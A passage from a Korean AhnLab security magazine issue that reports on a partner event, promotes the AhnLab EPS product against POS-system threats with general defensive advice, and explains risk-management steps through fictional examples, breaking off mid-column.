Embed Size (px)
Citation preview
POS Threats & AhnLab EPS
2015. 03
안랩 온라인 보안 매거진
3
6
1 0
1 4
2 0
2 5
2 8
2 9
월간
C O N T E N T S
S p O T L i g h T
Leading the future, Together
비전을 공유한 파트너는 또 하나의 안랩
S p E C i a L R E p O R T
POS 시스템 보안 위협과 안랩 EPS
해커의 시선, POS 시스템으로 향한다
E x p E R T C O L u m N
‘위험관리’ 단계별 따라 하기
T h R E aT a N a Ly S i S
인터넷 뱅킹 정보 탈취 악성코드 분석 보고서
가짜를 진짜로 둔갑시킨 악성코드, 실체는 ‘파밍’
T E C h R E p O R T
DEX 코드 은닉 기법 집중 분석
악성 앱, 아는 만큼 막을 수 있다!
i T & L i f E
사용하면 편리한 윈도 단축키 9가지
실제 피해 사례로 살펴본 최신 스미싱과 예방법
a h N L a b N E w S
사이버위협 대응 위한 민∙관 보안실무 2차회의 개최
안랩, ‘랜섬웨어 피해 예방 3대 수칙’ 제시
S TaT i S T i C S
2015년 1월 보안 통계 및 이슈
2015. 03
33
공인 파트너 대상 ‘안랩 파트너 데이 2015’ 개최
안랩은 지난 2월 11일 양재동 엘타워에서 ‘안랩 파트너 데이 2015’를 개최했다. 이날 행사에는 안랩 총판 및 파트너사의 대표이사와 영업대표
등 총 220여 명이 참석해 ‘2015년 안랩 파트너 비즈니스’의 힘찬 출발을 알렸다.
이상국 안랩 마케팅실 실장은 개회사를 통해 “2015년에는 시장에 대한 풍부한 경험을 지닌 파트너와 함께 안랩의 지능형 보안과 고객의 경험이
결합된 진정한 의미의 레졸루션(RE:SOLUTION)을 제안하려고 한다”며, “안랩과 파트너가 함께하는 2015년 성공 비즈니스의 혜안을 갖는데 도
움이 되기를 바란다”고 행사의 취지를 설명했다.
ahnLab partner Day 2015S p O T L i g h T
Leading the future, Together
아프리카 마사이족의 속담에 ‘가까운 곳을 가려면 혼자 가도 된다. 하지만 멀리 가려면 함께 가라!’는 말이 있다. 사막과 정글이라는
아프리카의 척박한 환경에서 살아남기 위한 마사이족의 지혜를 담은 얘기일 것이다. 현재는 정글과 같이 냉혹한 비즈니스 환경에서
‘파트너십(Partnership)’의 중요성을 강조하는 메시지로 해석된다.
올해로 창립 20주년을 맞이하는 안랩은 지속적인 성장을 위해 파트너 비즈니스를 강화해왔다. 2015년 안랩이 그리는 파트너 비즈니
스는 어떤 모습인지 ‘안랩 파트너 데이 2015(AhnLab Partner Day 2015)’ 현장에 다녀왔다.
비전을 공유한 파트너는 또 하나의 안랩
▲ ‘안랩 파트너 데이 2015’가 파트너사 임직원 220여 명이 참석한 가운데 성황리에 열렸다.
▲ 안랩은 공인 파트너사와의 협력을 다지는 ‘안랩 파트너 데이’를 매년 개최하고 있다.
44
▲ 권치중 안랩 대표(좌)와 정진교 실장(우)이 안랩의 고객 주도형 보안과 최신 보안 위협 트렌드를 설명했다.
▲ 강석균 안랩 전무(좌)와 고광수 상무(우)가 2015년 안랩 사업 전략과 채널 정책 및 지원 프로그램을 소개했다.
2015년 보안 위협 트렌드와 안랩의 대응 방안
올해로 7회째를 맞이하는 ‘안랩 파트너 데이 2015’에서 안랩은 최신 보안 위협과 대응 방안을 발표하고, 안랩의 사업 전략과 파트너 지원 프로
그램을 소개했다.
권치중 안랩 대표는 “안랩은 고객 만족을 중요한 핵심가치로 삼고 있으며, 고객과 파트너가 만족할 수 있는 제품, 서비스, 비즈니스 모델에 대해
더 많이 고민하겠다”고 밝혔다.
첫 번째 세션에서 정진교 안랩 제품기획실 실장은 최신 보안 위협 정보와 대응 방안을 발표했다.
정진교 실장은 2015 보안 위협 예측 키워드로 다변화, 고도화, 타깃화를 꼽았다. 이를 기반으로 2015년 보안 위협은 ▲모바일 결제 및 인터넷
뱅킹 공격 심화 ▲POS 시스템 위협의 본격화 ▲공격 대상별 맞춤형 악성코드의 진화 ▲APT 공격의 상시화/대중화 등의 4가지 특징을 보일 것
으로 예측된다고 설명했다.
안랩은 이러한 보안 위협의 특징에 따른 대응 방안으로 ▲인터넷 뱅킹 공격심화에 대비할 수 있는 안랩 세이프 트랜잭션(AhnLab Safe
Transaction) ▲POS 시스템 위협에 대비할 수 있는 특수 목적 시스템 보안 솔루션인 안랩 EPS ▲APT 공격 방어 솔루션인 안랩 MDS 등을 제공
하고 있다.
고객과 파트너의 성공이 안랩의 성공
이어서 안랩 국내 사업을 총괄하고 있는 강석균 전무가 올해 안랩의 사업 전략 발표에서 안랩은 올해 고객 가치 및 사업 성장 극대화를 위해 제
품/채널/고객 중심의 비즈니스 밸류 체인을 강화하겠다고 말했다.
강석균 전무는 “안랩의 성장의 기본은 파트너 성장이다”라고 전제하고, “올 한해 파트너와 더 많은 권한과 책임을 공유하며, 특히 파트너 지원
프로그램을 강화해 파트너사와의 동반성장을 도모할 계획”이라고 밝혔다.
마지막으로 고광수 안랩 채널사업본부 상무가 변화된 채널 정책과 파트너 지원 프로그램에 대해 세부적으로 소개했다. 고광수 상무는 올해 파
트너 비즈니스를 통해 어카운트 중심의 질적 성장과 파트너 중심의 양적 성장을 이뤄내겠다고 포부를 밝혔다.
안랩의 2015년 파트너 프로그램 가운데 눈 여겨 볼만한 것은 PCDP(Partner Coverage Development Program)이다. 이 프로그램은 특정 고객/
시장에 대한 영업권 보장, 특정 제품에 대한 판매권을 보장하는 것이다. 또한 안랩은 신규 고객 발굴과 기존 고객 유지를 위해 시스템 개선, 디지
털 마케팅, 파트너 협력 콘퍼런스 등을 준비 중이다.
55
▲ ‘AhnLab Partner Day 2015’에서는 지난해 최고의 사업 성과를 올린 8개 기업이 공로상을 수상했다.
멀리 가려면 함께 가라!
이날 참석한 파트너사들은 운영 정책과 지원 프로그램에 큰 기대감을 나타냈으며, 지역 파트너의 교육 프로그램과 ACSA(AhnLab Certified
Security Architect) 인증 시험 확대 등을 요청했다.
안랩의 공공/교육 총판인 비츠코리아의 임달혁 사장은 “안랩과 함께 파트너도 함께 성장할 수 있어 기쁘게 생각한다”며 “특화된 세일즈 전략을
통해 매출 다변화를 이루는 한 해로 만들겠다”고 포부를 밝혔다.
한편, 이날 행사에는 2014년 한해 동안 최고의 성과를 올린 파트너에게 공로상을 수여하는 ‘Best Partner Awards’도 진행되었다. 각 부문 최고
의 우수 파트너로는 네오시안, 소프트이천, 투씨엘시스템, 인사이드프로, 바이소프트, 포스텍, 피엔지텍, 한국정보시스템 등 총 8개 기업이 선정
되었다.
6
POS 시스템 보안 위협과 안랩 EPS
2013년 블랙 프라이데이 시즌에 발생한 미국의 대형 유통업체인 타겟(Target)사의 신용카드 정보와 개인정보 유출 사건이 세계를
깜짝 놀라게 했다. 주변에서 흔히 사용하는 결제 시스템 정도로만 여겼던 POS 시스템이 해커의 공격 대상이 되었고, 2300억 원이라
는 막대한 금전적 피해가 발생했다. 그 동안 보안 전문가들의 경고에도 불구하고 간과했던 POS 시스템의 보안 위협이 현실화된 것
이다. 사실 POS 시스템을 노린 해킹 사고가 발생한 것은 어제오늘 일이 아니다. 2009년 처음 트래커 악성코드가 발견된 후 해마다
POS 악성코드는 증가하고 있다. 반면, POS 시스템 환경에 맞는 보안 체계와 보안 솔루션 적용은 미흡한 상태이다.
이 글에서는 POS 시스템이 가지고 있는 특수 환경과 이를 노리는 보안 위협에 대해 알아본다. 그리고 이에 대한 보안 대응 방안으로
안랩의 POS 시스템 전용 보안 솔루션인 안랩 EPS(AhnLab EPS)에 대해 자세히 살펴보자.
해커의 시선, POS 시스템으로 향한다
왜 POS 시스템을 노리는가
안랩은 매년 발표하는 ‘올해의 보안 위협 트렌드 보고서’에서 ‘POS 시스템 보안 문제 대두’를 예측한 바 있다. 이 보고서에 따르면 올해에는 국
내에도 기존 POS 단말기 공격뿐만 아니라, POS 시스템 제작업체 대상 해킹 시도 등의 보다 다양하고 강력한 방식의 POS 시스템 공격 방식이
등장할 것으로 전망했다.
POS 시스템의 보안 위협에 대해 본격적으로 논의하기 앞서 POS 시스템이 무엇이며, 왜 해커들이 이 시스템을 겨냥하고 있는지 알아보자.
POS(Point of Sales) 시스템은 점포에서 판매와 동시에 품목, 가격, 수량 등의 유통 정보를 컴퓨터에 입력시켜 정보를 분석, 활용하는 관리 시스
템이다. 이를 통해 물품 계산은 물론 수시로 매출 동향을 파악하고 재고를 적정 수준으로 유지하는 등 상품관리에 있어서 중요한 역할을 담당하
는 핵심 시스템이다. 이제는 더 나아가 단순 지불, 회계, 영업상황, 재고 관리 등의 운영 정보 제공뿐 아니라 다양한 포인트와 맴버십 등 고객의
관리까지 사용되고 있다. 특히 최근 몇몇 서비스 제공 업체들은 이러한 POS의 고객 정보와 고객 스마트 기기의 위치 정보, 앱(APP) 사용 데이터
등 다양한 데이터 융합을 통해 고객 편의 및 충성도 개선을 위한 정보를 제공하고 있으며, 이 분야는 지속적으로 클라우드 연계과 함께 발전해
나갈 것으로 보인다.
ahnLab EpSS p E C i a L R E p O R T
6
[그림 1] POS 시스템의 운영 방식 *출처:epson-biz.com
7
이렇게 POS 시스템의 활용도가 높아지고 중요 정보를 다루고 있는데 비해 보안 대책은 미흡한 것이 현실이다. 일반적으로 POS 시스템은 대부분
저사양 컴퓨터에 관련 프로그램이 운용되는 형태다. 보통 POS 시스템은 대부분 메모리 1GB 정도의 낮은 사양인 데다 보안 프로그램은커녕 윈도
업데이트도 제대로 되지 않는다. 또한 POS 시스템을 본래 목적 외에 인터넷 검색 등의 용도로 사용하는 경우도 있어 악성코드에 쉽게 노출된다.
결론적으로 해커가 POS 시스템을 노리는 이유는 명확하다. 보안이 취약한 반면, 가치 있는 중요한 정보를 대량 보유하고 있기 때문이다.
POS 시스템의 위협과 현재 대응 방식의 한계
다양한 연결을 통한 네트워크 보안 위협
대형 유통 업체에서는 POS 시스템과 지불 승인 네트워크를 별도의 전용선을 이용할 것이다. 하지만 앞서 설명한 것과 같이 다양한 고객 정보,
포인트 정보 등 고객 관리 정보와의 연계 등을 위해 다른 네트워크와도 연결되고 있다. 중소 규모의 업체나 소매점의 경우에는 공용(public) 인
터넷 혹은 셀룰러(Cellular)를 통해 POS 시스템을 연결하여 지불 승인을 하거나 아예 서비스형 소프트웨어(Software as a Service, SaaS) 형태
의 클라우드 기반 POS로 운영하기도 한다. 이와 같은 네트워크 상황에서는 다양한 보안 홀(약점)이 존재할 수밖에 없으며, 특히 무선인터넷과
연결된 상황에서는 더욱 네트워크를 통한 침투 가능성이 높아진다.
서비스 종료된 운영체제 사용
현재 대부분의 POS 시스템은 운영체제로 서비스가 종료된 마이크로소프트의 윈도 XP(Windows XP) 및 이를 기반으로 한 WEPOS(Windows
Embedded for Point of Service), 윈도 임베디드 POSReady 2009(Windows Embedded POSReady 2009)를 사용하고 있다. 이 윈도 XP 계열
의 운영체제는 십여 년 전(2001년) 출시된 운영체제로 수많은 취약점과 공격 기법이 발견되고 있다. 특히, 이미 서비스가 종료된 운영체제이므
로 보안 패치 등의 보안 업데이트 서비스가 더 이상 제공되지 않아 보안에 매우 취약하다.
애플리케이션 취약점
POS 시스템은 이러한 범용적인 운영체제뿐 아니라 원격 제어 프로그램, 인터넷 익스플로러, 어도비 리더, 마이크로소프트 오피스 등 관리 및 편
의를 위한 다양한 프로그램도 함께 설치하여 사용하고 있다. 이러한 경우 일반적인 데스크톱 PC와 동일한 취약점에 노출될 수밖에 없다. 웹 브
라우저, PDF, DOC 등 문서, 자바(JAVA) 등 취약점을 통한 악성코드의 유입으로 POS 시스템은 공격자의 손에 넘어갈 수 있다.
POS 용도 이외의 인터넷, 외부매체 사용
마지막으로 점주 또는 점원이 POS 시스템을 개인 PC 사용하듯 POS 시스템을 타 용도로도 사용함으로 인해 위협에 노출될 수 있다. 즉, 외부에
서 USB 메모리를 통해 음악파일을 가져와서 복사하거나, 이메일, SNS 등 개인적인 인터넷 사용, 문서작업 등 POS 용도 외 다른 프로그램과 미
디어, 인터넷의 사용으로 악성코드의 유입뿐만 아니라 스피어 피싱과 같은 지능화된 공격의 위협에 노출된다.
POS 시스템은 이러한 취약점, 사회공학적인 공격까지 다양한 위협에 노출되어 있으나 현재 단말기의 보안은 안티바이러스 소프트웨어 사용과
데이터의 암호화 및 암호 통신 이외에 특별한 대안이 없다. 악성코드 유입으로 인해 장악된 POS 시스템에서는 데이터의 암호화나 암호 통신이
무의미해 지며, 시그니처 기반인 안티바이러스 소프트웨어는 이미 악성코드 대응에 약할 수밖에 없다. 물론 저사양의 POS 시스템 특성과 제한
된 네트워크 속도 상 꾸준히 시그니처를 업데이트하고 검사하는 안티바이러스 소프트웨어를 설치하고 구동하기 어려운 환경이라는 점도 감안
해야 한다.
POS 시스템, 일반 PC와 다른 보안 대책 필요
POS 시스템 해킹은 신용/직불카드 정보뿐 아니라 해당 카드를 사용한 고객의 정보, 포인트나 멤버십 정보까지 탈취하며, 이를 통한 카드 복제,
취득 정보의 2차, 3차 거래 등 다양한 범죄에 악용될 수 있다. 이러한 POS 시스템 보안은 일반적인 PC보다 더욱 강력한 보안이 요구되며 다각
도의 대책이 필요하다.
우선 POS 시스템의 로그인 암호를 복잡하게 설정하고 주기적으로 변경하고, 가급적 VNC, 원격 데스크톱(Remote Desktop) 등 원격제어 프
로그램을 사용하지 않아야 한다. 실제로 지난해 한 포럼이 진행한 프로젝트에서 ‘pos12345’, ‘posadmin’과 같이 유추하기 쉬운 비밀번호
7
[그림 2] 2009년 ~ 2014년에 발견된 주요 POS용 악성코드
88
와 원격 접속으로 POS 시스템의 권한을 탈취한 후 악성코드를 통해 신용카드 정보를 훔쳐낼 수 있다고 설명했다(http://www.theregister.
co.uk/2014/07/09/botnet_brute_forces_pos/).
또한 지불 결제에 필요한 네트워크 연결 외에 공용 인터넷과의 연결이나 무선 인터넷(WiFi) 연결 등은 모두 사용하지 않도록 하며, 인터넷 연결
이 부득이하게 필요한 경우에는 방화벽을 이용하여 필요한 연결만 가능하도록 한다.
그리고 직원 교육을 통해 POS 시스템으로 개인적인 인터넷 사용이나 외부 저장매체의 접촉, 문서 작업 등 POS 시스템 운용에 필요한 프로그램
이외에는 사용하지 않도록 해야 한다.
무엇보다도 가장 중요한 것은 모든 공격의 시작이 되는 악성코드의 유입과 실행을 차단해야 한다. POS와 같은 특수 목적 시스템은 일반적인 PC
와 다른 운영 환경으로 구성되어 시스템에 사용되는 애플리케이션은 명확하게 정의되어 있고, 해당 애플리케이션을 이용해 제한된 역할을 수행
하게 된다. 하지만 현재 이러한 특수 환경의 시스템도 일반 PC용 운영체제를 기반으로 하고 있어 다양한 보안 위협에 노출되어 있으며, 일반 PC
와 동일한 보안 체계를 사용하고 있다. 즉 POS 시스템은 해당 목적에 맞는 필요한 프로그램과 리소스만 사용하는 등 제한적인 환경 구성이 필
요하여, 일반 PC에 사용하는 안티바이러스 소프트웨어를 사용하는 것으로는 타깃 공격이나 고도화된 공격을 차단하기 어렵다. 또한 안티바이러
스 소프트웨어는 주기적인 시그니처의 업데이트와 디스크 검사 등을 수행해야 하므로 저사양 시스템으로 운용하는 POS 시스템에 과부하를 주
어 결제 지연 및 통신 장애 등을 유발할 수 있다.
최근 이러한 이유로 POS 시스템의 보안으로 애플리케이션 콘트롤 제품이 논의되고 있으나, 이 제품은 관리자의 전문적인 지식을 바탕으로 고도
의 애플리케이션 사용/차단 정책 관리가 필요하며, 보안 제품이 아닌 관리 제품이기에 악성코드 침입 및 감염 여부 등 위협을 탐지하고 판단하
여 대응하기에 보안 전문가의 관리가 필요하다. 하지만 중소상점의 점주들이 이러한 보안적 관리를 할 수 있는 경우는 거의 없으므로 애플리케
이션 콘트롤 제품은 도입하더라도 관리되지 못할 것이다.
POS 시스템 전용 보안 솔루션, AhnLab EPSAhnLab EPS(Endpoint Protection System)는 POS 같은 특수한 목적의 엔드포인트(fixed function devices)를 위한 전용 보안 솔루션으로 시
스템의 안정적 운용에 대한 민감도가 높고 정해진 프로그램만 사용하는 자동화기기 및 제어용 시스템 등에 최적화된 전용 보안 솔루션이다.
고도의 전문적인 관리가 필요한 애플리케이션 콘트롤(Application Control)과 달리 지능적인 화이트리스트(WhiteList) 기반으로 운영 시스템에
필요한 프로그램의 실행과 네트워크 연결, 시스템 자원만 사용 가능하게 한다. 이로 인해 불필요한 또는 비용도적(POS와 관련 없는) 프로그램의
실행을 차단하여, 악성코드의 유입과 악성코드의 활동을 억제할 수 있다.
안랩 EPS의 주요 기능은 다음과 같다.
√ 강력한 악성코드 탐지 및 확산 방지 기능
■ 서버에 보유한 악성코드 탐지•치료 엔진을 통한 에이전트의 악성코드 탐지 및 확산 방지
■ IP, 포트 차단 및 외부 저장장치 자동 실행 방지를 통한 감염 경로 차단
[그림 3] 일반 사무용 PC vs. POS 시스템 환경 차이
[그림 4] AhnLab EPS 주요 기능
99
■ OS 패치 업데이트 적용 여부와 관련 없는 보안성 확보
√ 비업무 프로그램 행위 및 불필요한 매체 차단
■ 허가된 애플리케이션 및 네트워크 연결만 사용할 수 있도록 관리
■ 저장 매체 등 매체 제어를 통한 비업무적 매체 연결 원천 차단
√ 초경량 보안 및 통제 솔루션
■ 에이전트가 설치되는 제어 시스템의 메모리, CPU 점유율 최소화
■ 모든 자원 소모 작업은 별도의 서버에서 수행
√ 중앙 집중식 관리 시스템
■ 대시보드를 통한 모든 에이전트 관리 포인트 단일화
■ 에이전트 그룹 기능을 통한 빠른 접근
■ 에이전트 미설치 기기 검색, 원격 통한 시스템 확인/점검
■ 중요 알림 및 통합 로그 관리
안랩 EPS는 지능적인 화이트리스트 방식의 애플리케이션 제어 기능으로 전문적인 보안 지식 없이도 운용이 가능하며, 중앙 관리를 통해 가맹점
의 운용 부담을 덜어준다.
또한 안랩 EPS 서버의 악성코드 분석 엔진을 통해 단말 시스템에 대해 백신 등의 주기적 업데이트와 이로 인한 네트워크 및 시스템 자원 점유
없이 악성코드를 탐지하고 차단할 수 있다. 특히 시스템 자체의 자원을 거의 사용하지 않고도 시스템에 생성되는 모든 실행 파일에 대한 실시간
검사와 분석을 수행할 수 있다. 이를 통해 POS 시스템 단말의 악성코드 대응과 알려지지 않은(Unknown) 위협의 분석까지 수행이 가능하여 별
도의 안티바이러스 솔루션을 추가로 구매/설치할 필요가 없다.
안랩 EPS는 강력한 락다운(Lockdown) 기능으로 POS 시스템 운용에 필요 없는 애플리케이션 및 시스템 기능과 매체•네트워크 연결 통제 기술
을 통해 모든 POS 시스템이 외부의 공격과 알려지지 않은 위협으로부터 항상 안전한 상태로 유지할 수 있게 해준다. 또한 서버에서 제공하는
악성코드 탐지 및 분석 기능과 보안 정책 관리를 통해 모든 시스템이 언제나 안전한 파일들로 구성되고 운영될 수 있도록 유지하고 보호한다.
즉, 사전 차단 및 보호를 통해 POS 시스템의 운용에 중점을 두고, 그 뒷단의 탐지 및 대응을 통해 추가적인 보안 정책 강화 등이 가능하다.
안랩 EPS는 다이소, 신세계 등 대형 유통 업체의 POS 시스템에 적용되어 성능과 안정성 측면에서 이미 검증된 제품이다. 또한 특수 목적 시스
템인 반도체 및 가전 생산 라인, 산업 설비 제어, 키오스크(KIOSK), ATM 등 다양한 분야에 전용 보안 솔루션으로 운용되고 있다.
실제 국내의 A 공항에 적용된 사례를 살펴보자. 이 공항의 FIDS는 1800여 대로 HDD없는 저사양 단말에 윈도 XP 임베디드(Windows XP
Embedded) 시스템으로 구성되어 일반적인 안티바이러스 소프트웨어 외에 다른 보안 대책이 없는 상태였다. 그러나 시스템 점유가 높고 지속
적인 시그니처 패턴 업데이트가 필요한 안티바이러스 소프트웨어로는 보안 대응에 한계뿐 아니라 시스템적인 부담까지 존재한 상태였다. 이 공
항은 이러한 문제점을 해결하기 위해 안티바이러스 소프트웨어 대신 안랩 EPS를 도입하여, 안정적인 FIDS 시스템 운영에 영향 없는 보안 체계
를 구축했다.
이렇듯 안랩 EPS는 특수 목적 시스템 전용 보안 솔루션으로 해당 시스템의 리소스와 관련 업무 프로세스에 영향 없이 사전적인 악성코드 차단
과 통제가 가능하고, 이를 통한 정보 유출 방지와 생산성 향상, 관리 및 운용 비용 절감 효과를 거둘 수 있다.
[그림 5] A 공항의 안랩 EPS 구축 사례
1010
E x p E R T C O L u m N
‘위험관리’ 단계별 따라 하기
Risk management
그 동안 ‘월간 안’을 통해 정보보호 컴플라이언스에 관한 내용을 여러 차례 다룬 바 있다. 이번에는 보안 활동의 핵심이라 할 수 있는
‘위험관리’에 대해 알아보고자 한다. ‘위험관리’는 정보보호 법령과도 밀접한 관계가 있다. ‘정보통신망 이용촉진 및 정보보호 등에 관한
법’(이하 정통망법)에서 요구하는 정보보호관리체계인증의 핵심적인 단계가 바로 위험관리이기 때문이다.
정통망법 제47조(정보보호관리체계의 인증)는 일정 기준(정보통신서
비스 부문 전년도 매출액이 100억 원 이상이거나 전년도말 기준, 직
전 3개월 간의 일일 평균 이용자 수가 100만 명 이상인 경우)에 해당
하는 기업은 정보보호관리체계인증(이하 ISMS)을 의무적으로 취득해
야 한다고 명시하고 있다.
하게 설명하겠다. 각 단계별로 사례를 통해 설명하기 위해 가상의 실
습자를 설정하였는데, 한 사람은 기업 인사팀 직원이고 다른 사람은
한 아이의 아버지이다. 기업 담당자가 아닌 일반인을 예로 든 까닭은
위험관리가 비즈니스에서만 쓰는 것이 아니라 일상에서도 활용할 수
있는 유용한 지식이기 때문이다.
1단계: 나에게 소중한 대상은 무엇인가 – 자산 식별
위험관리에서 자산을 식별하는 것은 가장 먼저 하는 일이자 핵심이
되는 일이다. 자산(Asset)이란 ‘가치 있는 대상’을 뜻한다. 기업의 자
산이라면 경제적 가치를 중심으로 하겠지만 개인에게 있어서는 어떤
의미로든 가치가 있다면 그 대상을 자산으로 보면 된다. 자산이 중요
한 이유는 그것이 보안의 목적이자 활동 근거이기 때문이다.
보안(保安)은 ‘안전하게(安) 지킨다(保)’는 뜻이다. 안전하게 지키기 위
해서는 지키고자 하는 대상이 있어야 하고, 그 대상은 지킬 가치가 있
는 것이라야 할 것이다. 그러한 대상이 무엇인지 파악하고 지켜야 할
이유를 납득하며 지키는 주체가 누구인지 확실히 아는 것이 위험관리
의 시작이자 이후의 과정을 관통하는 중추인 것이다.
위험관리의 단계는 크게 ‘자산 식별-위험 분석-위험 평가-대책 결
정’으로 나누어 볼 수 있다. 위험분석을 위한 방법론에는 베이스라인
접근법, 비정형 접근법, 상세 위험 분석, 복합 접근법 등 여러 기법이
있다.
이 글에서는 일반인, 즉 보안 전문지식이 높지 않은 사람이 위험관리
의 개념을 이해하고 현실에서 적용할 수 있도록 예를 들어 쉽고 간략
[그림 1] 정보보호관리체계 5단계 관리 과정 (*출처: 한국인터넷진흥원)
‘위험관리 따라 하기’ 실습자
안전해 대리
A기업의 인사팀 채용 담당자
인자한 씨
초등학교에 입학한 아들을 둔 아빠.
아이가 다니는 학교가 집에서 500여미
터 거리지만 차도를 반드시 건너야 하
기 때문에 교통사고를 우려하고 있다.
11
실습자 인터뷰
안전해 대리
“제 업무와 관련해서 가장 중요한 정보
는 입사지원자의 인사정보입니다. 온라
인으로 접수하기도 하고 서류로 받기도
하는데 채용이 확정될 때까지 이 정보
들을 안전하게 보관해야만 합니다.”
인자한 씨
“제게 소중한 대상은 무엇보다 제 아이
죠. 아이가 다치는 것은 상상조차 하기
싫습니다. 차라리 제가 다치는 것이 낫
죠.”
실습자 인터뷰
안전해 대리
“사고가 생긴다면 아마도 채용시스템 장애가
아닐까 싶어요. 온라인으로 접수를 했는데 그
시스템이 망가져서 저장된 데이터가 사라진
다면 큰 문제죠. 어쩌면 입사 지원한 사람에겐
인생이 걸린 문제일 수도 있잖아요. 입사서류
를 분실하게 되어도 마찬가지구요.
한 가지 더 걱정되는 게 있는데, 얼마 전 개인
정보보호법 교육을 받아보니 입사지원자 주민
등록번호를 받는 게 불법이라 하더라구요. 그
게 사실이라면 회사 이미지도 나빠질 수도 있
고, 제 업무에도 차질이 클 것 같아요”.
인자한 씨
“우리 아이에게 해를 끼칠 수 있는 대상이라면
아마도 자동차겠죠. 교통사고요.”
실습자 인터뷰
안전해 대리
“입사지원 서류가 접수되면 일단 복사해서 사
본을 만들기 때문에 분실되어도 어느 정도 대
책은 있어요. 그런데 최근에 오픈한 채용시스
템은 백업시스템이 없다고 하네요.
서류와 관련해서는 또 다른 문제가 있는데, 채
용에 관련된 각 팀 관리자들에게 면접 전에 입
사자 지원서류를 나눠주거든요. 그런데 얼마
전에 그 서류 중 하나가 화장실 휴지통에서 발
견된 일이 있어요. 관리가 안 된 거죠.
그리고 주민등록번호 수집 문제는 서류뿐
만 아니라 외주 개발한 채용시스템과도
연관이 있는데 법무팀이 없으니 어디까지 손
을 봐야 하는 건지 모르겠어요.”
인자한 씨
“우리 집과 학교 사이에는 건널목이 5개가 있
습니다. 그 중 3군데는 봉사하시는 녹색어머
니회 분들이 아침마다 아이들 안전을 챙겨 준
다고 해요. 그런데 나머지 2군데 건널목엔 그
런 봉사자도 없고, 게다가 방과 후에는 5군데
모두 따로 봐주는 사람이 없거든요. 우리 가족
중 누구라도 챙길 수 있으면 좋으련만 그것도
여의치가 않네요”
자산의 내용을 파악했다면 자산을 지킬 책임이 누구에게 있는지, 자
산의 손실이 미칠 영향이 어느 정도인지 그 중요도를 정량적 또는 정
성적으로 표현한다. 사례에서 기업의 정보 자산을 취급하는 안전해
대리는 자산가 치를 3점 단위로 정량 평가하고 인자한 씨의 경우는
정성적으로 표현하였다.
위협의 정도는 위협이 미칠 영향과 위협이 발생할 빈도를 고려하여
측정하는 것이 일반적이다. 자주 발생하더라도 별다른 영향 없는 위
협이 있을 수 있고, 딱 한 번이더라도 돌이킬 수 없는 손실을 입히는
위협도 있을 것이다.
인자한 씨라면 아이가 놀다가 넘어지는 정도는 여러 번 발생하더라도
심각한 영향은 없는 위협으로 볼 수도 있다. 반면 교통사고는 단 한
번 일어나더라도 치명적인 위협일 것이다. [표 1]의 평가 모델은 기업
의 위험분석에 쓰이기는 하지만 이것이 절대적인 기준은 아니다. 기업
나름의 기준을 정하여 일관성 있게 적용한다면 그것으로 충분하다.
2단계: 소중한 대상(자산)에 해를 끼칠 수 있는 요소는 무엇인가 –
위협 분석
위협(Threat)이란 자산의 속성을 훼손할 수 있는 내•외부의 요인이
다. 정보보호 분야에서 안전하게 유지해야 할 자산의 속성은 ▲가용
성(Availability) ▲무결성(Integrity) ▲기밀성(Confidentiality) 등 세
가지이다.
가용성이란 어떤 대상의 지속적인 사용을 보장하는 것으로, 정보시스
템이라면 서비스가 장애 없이 운영되는 것이고 사람이라면 아프지 않
고 정상적인 활동이 가능한 상태라 할 수 있겠다. 무결성은 정보의 내
용이 변조되지 않고 일관성을 유지할 수 있는 상태를 뜻한다. 예를 들
어, 은행 전산시스템이 해킹되어 통장 잔고가 1억원에서 1원으로 바
뀌었다면 무결성이 훼손되었다고 할 수 있다. 기밀성은 정보에 접근할
수 있는 권한의 차등성이 유지되는 것이다. 쉽게 말해 다른 사람이 알
면 안 되는 내용이라면 그들이 알 수 없도록 지켜져야 한다는 뜻이다.
3단계: 위협에 대한 약점은 무엇인가 – 취약성 분석
취약성(Vulnerability)이란 위협에 대응하여 위험의 실현 가능성을 높
이는 요인이다. 자산에 내재된 단일한 요소를 뜻하지만 현실에서는
여러 요소의 결합이나 특정한 상황을 포함할 수도 있다. 예컨대 B형
간염 항원이라는 위협에 대해서 항체가 없는 상태라면 ‘B형간염 항체
없음’이 취약성이 된다.
정보통신서비스와 관련한 취약성은 발견된 내용이 너무 많아 일종의
사전(Dictionary)이 구축되어 있을 정도다. cve.mitre.org와 같은 사
이트를 참고하면 도움이 될 것이다.
자가 평가 결과1: 안전해 대리
주요 자산 책임자 자산 중요도 비고
입사지원정보(온라인) 안전해 3 중요도기준(임의적)
3: 회사 전체에 치명적 영향
2: 사업 일부에 영향
1: 조직 일부에 영향
입사지원서류 안전해 2
기업 평판 대표이사 3
위협평가 사례1: 안전해 대리
예상 위협 위협 영향 발생 빈도 위협 정도 위협 등급
채용시스템 장애 VH L 5 3
채용서류 분실 H H 6 3
채용과정 법규위반 VH VH 8 4
위협평가 사례2: 인자한씨
예상 위협 위협 영향 발생 빈도 위협 정도 위협 등급
교통사고 치명적 아직 없음 치명적 매우 높음
자가 평가 결과2: 인자해 씨
주요 자산 책임자 자산 중요도 비고
아들 인자한 ∞ 특정 단위로 측정 불가
[표 1] 위협 평가 모델 (*출처: 한국인터넷진흥원)
12
안전해 대리의 인터뷰에 따르면, ‘채용시스템 장애’라는 위협에 대한
취약성은 데이터 백업이 되지 않고 있는 상황이라 할 수 있다. 입사지
원자의 정보를 출력한 문서가 관리 부실로 방치되고 있다는 점도 서
류 분실에 따른 위험을 높이고 있음이 분명하다. 한편 인자한 씨는 아
이가 건널목을 건너다가 교통사고를 당할 수도 있다는 위험과 관련
해, 관리가 되지 않는 아침 2개 구간과 방과 후 5개의 건널목 모두에
보호 방책이 없는 환경을 우려하고 있다.
취약성의 영향도는 위협이 작동할 여지를 크게 한다고 판단될수록 심
각하다고 볼 수 있다. 사례에서는 VH(Very High), H(High)와 같은 형
식으로 표현했지만 숫자로만 표시해도 무방하고 다른 어떤 표현을 써
도 관계없다. 단지 각각의 취약성 정도가 동일한 수준이 아닐 때 그
차이를 식별할 기준만 명확하면 된다.
4단계: 얼마나 위험한 것인가 – 위험 평가
위험 평가는 앞의 1, 2, 3 단계에서 측정한 자산 중요도, 위협 정도,
취약성 정도를 입력 값으로 하여 위험수준이라는 출력 값을 얻고 어
느 수준까지 위험을 수용할지 판단하는 과정이다. 국제공인 정보시스
템 보안전문가(CISSP) 가이드북에는 다음과 같은 수식으로 위험이 표
현되어 있다.
어떤 방식으로 위험 정도를 산출하는가는 중요한 문제가 아니다. 위험
평가를 하는 이유는 위험에 대처할 기준을 정하기 위한 것이다. 위험
